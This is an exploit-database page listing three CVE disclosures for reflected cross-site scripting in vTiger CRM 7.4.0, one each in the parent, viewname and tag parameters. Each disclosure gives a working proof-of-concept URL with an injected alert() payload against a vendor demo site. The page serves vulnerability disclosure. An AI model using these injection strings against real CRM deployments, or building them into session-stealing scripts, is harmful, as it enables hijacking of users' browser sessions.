Share
## https://sploitus.com/exploit?id=PACKETSTORM:180462
[CVE-ID]:CVE-2024-44778  
------------------------------------------  
[Suggested description]:A reflected cross-site scripting (XSS) vulnerability in the parent parameter in the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload.  
------------------------------------------  
[Additional Information]  
PoC:  
https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&parent=%22-alert()-%22  
------------------------------------------  
[Vulnerability Type]:Cross Site Scripting (XSS)  
------------------------------------------  
[Vendor of Product]:vTiger  
------------------------------------------  
[Affected Product Code Base]:vTiger CRM - 7.4.0.  
------------------------------------------  
[Affected Component]:The parent parameter of vTiger CRM 7.4.0 Index page  
------------------------------------------  
[Attack Type]:Remote  
------------------------------------------  
[CVE Impact Other]:Run Arbitrary Javascript code  
------------------------------------------  
[Attack Vectors]:Crafted URL  
------------------------------------------  
[Has vendor confirmed or acknowledged the vulnerability?]:true  
------------------------------------------  
[Discoverer]:Marco Nappi  
------------------------------------------  
[Reference]  
http://vtiger.com  
https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&parent=%22-alert()-%22  
  
  
  
  
[CVE-ID]:CVE-2024-44779  
------------------------------------------  
[Suggested description]  
A reflected cross-site scripting (XSS) vulnerability in the viewname parameter in the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload.  
------------------------------------------  
[Additional Information]:  
PoC:  
https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Accounts&view=List&viewname=95ddd'+onpointerdown=alert()+alt=  
------------------------------------------  
[Vulnerability Type]  
Cross Site Scripting (XSS)  
------------------------------------------  
[Vendor of Product]:vTiger  
------------------------------------------  
[Affected Product Code Base]:vTiger CRM - 7.4.0.  
------------------------------------------  
[Affected Component]:The "viewname" parameter of vTiger CRM 7.4.0 Index page .  
------------------------------------------  
[Attack Type]:Remote  
------------------------------------------  
[CVE Impact Other]:  
Run Arbitrary JS code  
------------------------------------------  
[Attack Vectors]  
Crafted URL  
------------------------------------------  
[Has vendor confirmed or acknowledged the vulnerability?]:true  
------------------------------------------  
[Discoverer]:Marco Nappi  
------------------------------------------  
[Reference]  
http://vtiger.com  
https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Accounts&view=List&viewname=95ddd  
  
  
  
[CVE-ID]:CVE-2024-44777  
------------------------------------------  
[Suggested description]  
A reflected cross-site scripting (XSS) vulnerability in the tag parameter in the index page of vTiger CRM 7.4.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload.  
------------------------------------------  
[Additional Information]  
PoC:  
https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&tag=);alert();%22+alt=%22  
------------------------------------------  
[Vulnerability Type]:Cross Site Scripting (XSS)  
------------------------------------------  
[Vendor of Product]:vTiger  
------------------------------------------  
[Affected Product Code Base]:vTiger CRM - 7.4.0.  
------------------------------------------  
[Affected Component]  
The "tag" parameter of vTiger CRM 7.4.0 Index page  
------------------------------------------  
[Attack Type]:Remote  
------------------------------------------  
[CVE Impact Other]  
Run Arbitrary Javascript code  
------------------------------------------  
[Attack Vectors]:Crafted URL  
------------------------------------------  
[Has vendor confirmed or acknowledged the vulnerability?]:true  
------------------------------------------  
[Discoverer]:Marco Nappi  
------------------------------------------  
[Reference]  
http://vtiger.com  
https://demo7.vtexperts.com/vtigercrm7demo/index.php?module=Invoice&view=List&app=INVENTORY&tag=);alert();%22+alt=%22